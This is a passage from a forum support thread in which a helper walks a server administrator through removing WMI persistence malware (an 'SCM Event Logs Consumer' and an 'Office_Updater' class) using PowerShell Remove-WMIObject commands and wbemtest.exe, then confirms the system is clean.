Actually, simply delete the SCM Event Logs Consumer. It should do the trick. I'll see if I can find an easy way for you to delete the whole Office_updater as a whole.

Share this post


Link to post
Share on other sites

Now, if you restart the server (if you're able to), are the processes still present?

Share this post


Link to post
Share on other sites

I will have to wait till after business hours to restart the server. I will do so as soon as I can.

 

Share this post


Link to post
Share on other sites

Ok, I was able restart the server. Since I deleted the  SCM Event Logs Consumer entry PowerShell has not opened. I will be monitoring it periodically throughout the night.

 

Share this post


Link to post
Share on other sites

Awesome :) I'll look into the WMI stuff tomorrow. Let me know if it ever comeback in the meantime.

Share this post


Link to post
Share on other sites

We are still looking good here,   there has been no recurrence. Do you have any idea what this malware was doing?

Share this post


Link to post
Share on other sites

Good! Can you run the WMI_Lister23 script again to generate a new DumpedScripts.txt log?

Share this post


Link to post
Share on other sites

Maybe these commands will do the trick.

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Logs Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([WmiClass]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose

 

Share this post


Link to post
Share on other sites

Alright I ran those - I marked the one that returned yellow with the orange text. I also ran WMILister again,

DumptedScripts.txt

 

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
VERBOSE: Performing the operation "Remove-WmiObject" on target
"\\WIN-K9REC7QI4JS\ROOT\Subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"SCM Event Logs
 Consumer\"",Filter="__EventFilter.Name=\"SCM Event Logs Filter\""".

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Logs Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([Wmi
Class]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose
PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Alright so the only thing left to remove is root\DEFAULT:Office_Updater... Ever used wbemtest.exe? I think it would be the easiest way. Launch it, connect to root\DEFAULT, click on the Enumerate Classes button, check the Recursive option, enter nothing in the Superclass field and click on Ok. From there, find Office_Updater and delete it.

Share this post


Link to post
Share on other sites

Awesome! It does look clean indeed :) No traces of any rogue WMI entries left!

We can keep the thread open till tomorrow, just in case the infection returns, but I think we got it.

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.